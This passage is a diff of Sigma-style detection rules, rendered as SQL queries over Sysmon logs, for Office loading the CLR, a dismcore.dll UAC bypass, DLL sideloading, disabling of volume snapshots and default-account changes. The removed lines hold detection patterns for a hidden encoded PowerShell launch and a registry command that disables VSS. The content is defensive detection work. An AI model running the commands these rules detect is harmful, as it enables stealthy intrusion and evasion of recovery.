"description": "Detects CLR DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.lateral_movement" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" + "filename": "image_load_office_dotnet_clr_dll_load.yml" }, { - "title": "Suspicious PowerShell Parent Process", - "id": "754ed792-634f-40ae-b3bc-e0448d33f695", + "title": "UAC Bypass With Fake DLL", + "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "status": "test", - "description": "Detects a suspicious or uncommon parent processes of PowerShell", - "author": "Teymur Kheirkhabarov, Harish Segar", + "description": "Attempts to load dismcore.dll after dropping it", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" ], "falsepositives": [ - "Other scripts" + "Actions of a legitimate telnet client" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%tomcat%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_susp_parent_process.yml" + "filename": "image_load_uac_bypass_via_dism.yml" }, { - "title": "Disabled Volume Snapshots", - "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", - "status": "test", - "description": "Detects commands that temporarily turn off Volume Snapshots", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", + "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", + "status": "experimental", + "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" ], - "filename": "proc_creation_win_reg_volsnap_disable.yml" + "filename": "image_load_side_load_non_existent_dlls.yml" }, { - "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", - "id": "5b768e71-86f2-4879-b448-81061cbae951", + "title": "Potential System DLL Sideloading From Non System Locations", + "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", "status": "experimental", - "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' 